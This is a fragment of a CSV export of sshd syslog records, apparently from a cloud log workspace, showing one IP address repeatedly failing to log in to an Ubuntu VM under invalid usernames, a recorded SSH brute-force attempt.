+19604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:30,UbuntuDevEnv,2019-06-06 18:05:29,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 46682:11: Normal Shutdown, Thank you for playing [preauth]",9978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,46682,,
+19605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:36,UbuntuDevEnv,2019-06-06 18:05:35,auth,UbuntuDevEnv,info,Invalid user ts3 from 128.199.149.61 port 51298,9985,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,128.199.149.6,51298,,
+19606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:36,UbuntuDevEnv,2019-06-06 18:05:36,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3 128.199.149.61 port 51298 [preauth],9985,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,128.199.149.6,51298,,
+19607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:36,UbuntuDevEnv,2019-06-06 18:05:36,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 51298:11: Normal Shutdown, Thank you for playing [preauth]",9985,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,51298,,
+19608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:43,UbuntuDevEnv,2019-06-06 18:05:43,auth,UbuntuDevEnv,info,Invalid user ts3bot from 128.199.149.61 port 55924,9996,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3bot,128.199.149.6,55924,,
+19609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:43,UbuntuDevEnv,2019-06-06 18:05:43,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 55924:11: Normal Shutdown, Thank you for playing [preauth]",9996,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,55924,,
+19610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:43,UbuntuDevEnv,2019-06-06 18:05:43,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3bot 128.199.149.61 port 55924 [preauth],9996,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3bot,128.199.149.6,55924,,
+19611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:50,UbuntuDevEnv,2019-06-06 18:05:49,auth,UbuntuDevEnv,info,Invalid user ts3server from 128.199.149.61 port 60548,10008,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3server,128.199.149.6,60548,,
+19612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:50,UbuntuDevEnv,2019-06-06 18:05:49,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 60548:11: Normal Shutdown, Thank you for playing [preauth]",10008,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,60548,,
+19613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:50,UbuntuDevEnv,2019-06-06 18:05:49,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3server 128.199.149.61 port 60548 [preauth],10008,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3server,128.199.149.6,60548,,
+19614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:57,UbuntuDevEnv,2019-06-06 18:05:56,auth,UbuntuDevEnv,info,Invalid user bot from 128.199.149.61 port 36952,10021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bot,128.199.149.6,36952,,
+19615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:57,UbuntuDevEnv,2019-06-06 18:05:56,auth,UbuntuDevEnv,info,Disconnected from invalid user bot 128.199.149.61 port 36952 [preauth],10021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bot,128.199.149.6,36952,,
+19616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:05:57,UbuntuDevEnv,2019-06-06 18:05:56,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 36952:11: Normal Shutdown, Thank you for playing [preauth]",10021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,36952,,
+19617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:03,UbuntuDevEnv,2019-06-06 18:06:03,auth,UbuntuDevEnv,info,Invalid user narcisa from 128.199.149.61 port 41566,10032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,narcisa,128.199.149.6,41566,,
+19618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:03,UbuntuDevEnv,2019-06-06 18:06:03,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 41566:11: Normal Shutdown, Thank you for playing [preauth]",10032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,41566,,
+19619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:03,UbuntuDevEnv,2019-06-06 18:06:03,auth,UbuntuDevEnv,info,Disconnected from invalid user narcisa 128.199.149.61 port 41566 [preauth],10032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,narcisa,128.199.149.6,41566,,
+19620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:10,UbuntuDevEnv,2019-06-06 18:06:10,auth,UbuntuDevEnv,info,Invalid user robert from 128.199.149.61 port 46190,10045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,robert,128.199.149.6,46190,,
+19621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:11,UbuntuDevEnv,2019-06-06 18:06:10,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 46190:11: Normal Shutdown, Thank you for playing [preauth]",10045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,46190,,
+19622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:11,UbuntuDevEnv,2019-06-06 18:06:10,auth,UbuntuDevEnv,info,Disconnected from invalid user robert 128.199.149.61 port 46190 [preauth],10045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,robert,128.199.149.6,46190,,
+19623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:17,UbuntuDevEnv,2019-06-06 18:06:16,auth,UbuntuDevEnv,info,Invalid user cristian from 128.199.149.61 port 50812,10063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cristian,128.199.149.6,50812,,
+19624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:17,UbuntuDevEnv,2019-06-06 18:06:17,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 50812:11: Normal Shutdown, Thank you for playing [preauth]",10063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,50812,,
+19625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:17,UbuntuDevEnv,2019-06-06 18:06:17,auth,UbuntuDevEnv,info,Disconnected from invalid user cristian 128.199.149.61 port 50812 [preauth],10063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cristian,128.199.149.6,50812,,
+19626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:24,UbuntuDevEnv,2019-06-06 18:06:24,auth,UbuntuDevEnv,info,Invalid user matt from 128.199.149.61 port 55432,10069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,matt,128.199.149.6,55432,,
+19627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:24,UbuntuDevEnv,2019-06-06 18:06:24,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 55432:11: Normal Shutdown, Thank you for playing [preauth]",10069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,55432,,
+19628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:24,UbuntuDevEnv,2019-06-06 18:06:24,auth,UbuntuDevEnv,info,Disconnected from invalid user matt 128.199.149.61 port 55432 [preauth],10069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,matt,128.199.149.6,55432,,
+19629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:31,UbuntuDevEnv,2019-06-06 18:06:31,auth,UbuntuDevEnv,info,Invalid user sales from 128.199.149.61 port 60052,10141,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sales,128.199.149.6,60052,,
+19630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:31,UbuntuDevEnv,2019-06-06 18:06:31,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 60052:11: Normal Shutdown, Thank you for playing [preauth]",10141,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,60052,,
+19631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:31,UbuntuDevEnv,2019-06-06 18:06:31,auth,UbuntuDevEnv,info,Disconnected from invalid user sales 128.199.149.61 port 60052 [preauth],10141,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sales,128.199.149.6,60052,,
+19632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:37,UbuntuDevEnv,2019-06-06 18:06:37,auth,UbuntuDevEnv,info,Invalid user alan from 128.199.149.61 port 36446,10147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alan,128.199.149.6,36446,,
+19633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:38,UbuntuDevEnv,2019-06-06 18:06:37,auth,UbuntuDevEnv,info,Disconnected from invalid user alan 128.199.149.61 port 36446 [preauth],10147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alan,128.199.149.6,36446,,
+19634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:38,UbuntuDevEnv,2019-06-06 18:06:37,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 36446:11: Normal Shutdown, Thank you for playing [preauth]",10147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,36446,,
+19635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:44,UbuntuDevEnv,2019-06-06 18:06:44,auth,UbuntuDevEnv,info,Invalid user ahmed from 128.199.149.61 port 41070,10162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ahmed,128.199.149.6,41070,,
+19636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:45,UbuntuDevEnv,2019-06-06 18:06:44,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 41070:11: Normal Shutdown, Thank you for playing [preauth]",10162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,41070,,
+19637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:45,UbuntuDevEnv,2019-06-06 18:06:44,auth,UbuntuDevEnv,info,Disconnected from invalid user ahmed 128.199.149.61 port 41070 [preauth],10162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ahmed,128.199.149.6,41070,,
+19638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:51,UbuntuDevEnv,2019-06-06 18:06:51,auth,UbuntuDevEnv,info,Invalid user david from 128.199.149.61 port 45696,10172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,david,128.199.149.6,45696,,
+19639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:51,UbuntuDevEnv,2019-06-06 18:06:51,auth,UbuntuDevEnv,info,Disconnected from invalid user david 128.199.149.61 port 45696 [preauth],10172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,david,128.199.149.6,45696,,
+19640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:51,UbuntuDevEnv,2019-06-06 18:06:51,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 45696:11: Normal Shutdown, Thank you for playing [preauth]",10172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,45696,,
+19641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:58,UbuntuDevEnv,2019-06-06 18:06:58,auth,UbuntuDevEnv,info,Invalid user bamboo from 128.199.149.61 port 50318,10189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bamboo,128.199.149.6,50318,,
+19642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:58,UbuntuDevEnv,2019-06-06 18:06:58,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 50318:11: Normal Shutdown, Thank you for playing [preauth]",10189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,50318,,
+19643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:06:58,UbuntuDevEnv,2019-06-06 18:06:58,auth,UbuntuDevEnv,info,Disconnected from invalid user bamboo 128.199.149.61 port 50318 [preauth],10189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bamboo,128.199.149.6,50318,,
+19644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:04,UbuntuDevEnv,2019-06-06 18:07:04,auth,UbuntuDevEnv,info,Invalid user eric from 128.199.149.61 port 54940,10197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eric,128.199.149.6,54940,,
+19645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:04,UbuntuDevEnv,2019-06-06 18:07:04,auth,UbuntuDevEnv,info,Disconnected from invalid user eric 128.199.149.61 port 54940 [preauth],10197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eric,128.199.149.6,54940,,
+19646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:04,UbuntuDevEnv,2019-06-06 18:07:04,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 54940:11: Normal Shutdown, Thank you for playing [preauth]",10197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,54940,,
+19647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:12,UbuntuDevEnv,2019-06-06 18:07:11,auth,UbuntuDevEnv,info,Invalid user erik from 128.199.149.61 port 59564,10215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,erik,128.199.149.6,59564,,
+19648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:12,UbuntuDevEnv,2019-06-06 18:07:11,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 59564:11: Normal Shutdown, Thank you for playing [preauth]",10215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,59564,,
+19649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:12,UbuntuDevEnv,2019-06-06 18:07:11,auth,UbuntuDevEnv,info,Disconnected from invalid user erik 128.199.149.61 port 59564 [preauth],10215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,erik,128.199.149.6,59564,,
+19650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:18,UbuntuDevEnv,2019-06-06 18:07:18,auth,UbuntuDevEnv,info,Invalid user erick from 128.199.149.61 port 35954,10231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,erick,128.199.149.6,35954,,
+19651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:18,UbuntuDevEnv,2019-06-06 18:07:18,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 35954:11: Normal Shutdown, Thank you for playing [preauth]",10231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,35954,,
+19652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:18,UbuntuDevEnv,2019-06-06 18:07:18,auth,UbuntuDevEnv,info,Disconnected from invalid user erick 128.199.149.61 port 35954 [preauth],10231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,erick,128.199.149.6,35954,,
+19653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:26,UbuntuDevEnv,2019-06-06 18:07:25,auth,UbuntuDevEnv,info,Invalid user server from 128.199.149.61 port 40568,10241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,128.199.149.6,40568,,
+19654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:26,UbuntuDevEnv,2019-06-06 18:07:25,auth,UbuntuDevEnv,info,Disconnected from invalid user server 128.199.149.61 port 40568 [preauth],10241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,128.199.149.6,40568,,
+19655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:26,UbuntuDevEnv,2019-06-06 18:07:25,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 40568:11: Normal Shutdown, Thank you for playing [preauth]",10241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,40568,,
+19656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:32,UbuntuDevEnv,2019-06-06 18:07:32,auth,UbuntuDevEnv,info,Invalid user prueba from 128.199.149.61 port 45200,10254,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prueba,128.199.149.6,45200,,
+19657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:32,UbuntuDevEnv,2019-06-06 18:07:32,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 45200:11: Normal Shutdown, Thank you for playing [preauth]",10254,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,45200,,
+19658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:32,UbuntuDevEnv,2019-06-06 18:07:32,auth,UbuntuDevEnv,info,Disconnected from invalid user prueba 128.199.149.61 port 45200 [preauth],10254,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prueba,128.199.149.6,45200,,
+19659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:39,UbuntuDevEnv,2019-06-06 18:07:38,auth,UbuntuDevEnv,info,Invalid user usuario from 128.199.149.61 port 49828,10260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,usuario,128.199.149.6,49828,,
+19660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:39,UbuntuDevEnv,2019-06-06 18:07:38,auth,UbuntuDevEnv,info,Disconnected from invalid user usuario 128.199.149.61 port 49828 [preauth],10260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,usuario,128.199.149.6,49828,,
+19661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:39,UbuntuDevEnv,2019-06-06 18:07:38,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 49828:11: Normal Shutdown, Thank you for playing [preauth]",10260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,49828,,
+19662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:46,UbuntuDevEnv,2019-06-06 18:07:45,auth,UbuntuDevEnv,info,Invalid user git from 128.199.149.61 port 54446,10275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,128.199.149.6,54446,,
+19663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:46,UbuntuDevEnv,2019-06-06 18:07:45,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 54446:11: Normal Shutdown, Thank you for playing [preauth]",10275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,54446,,
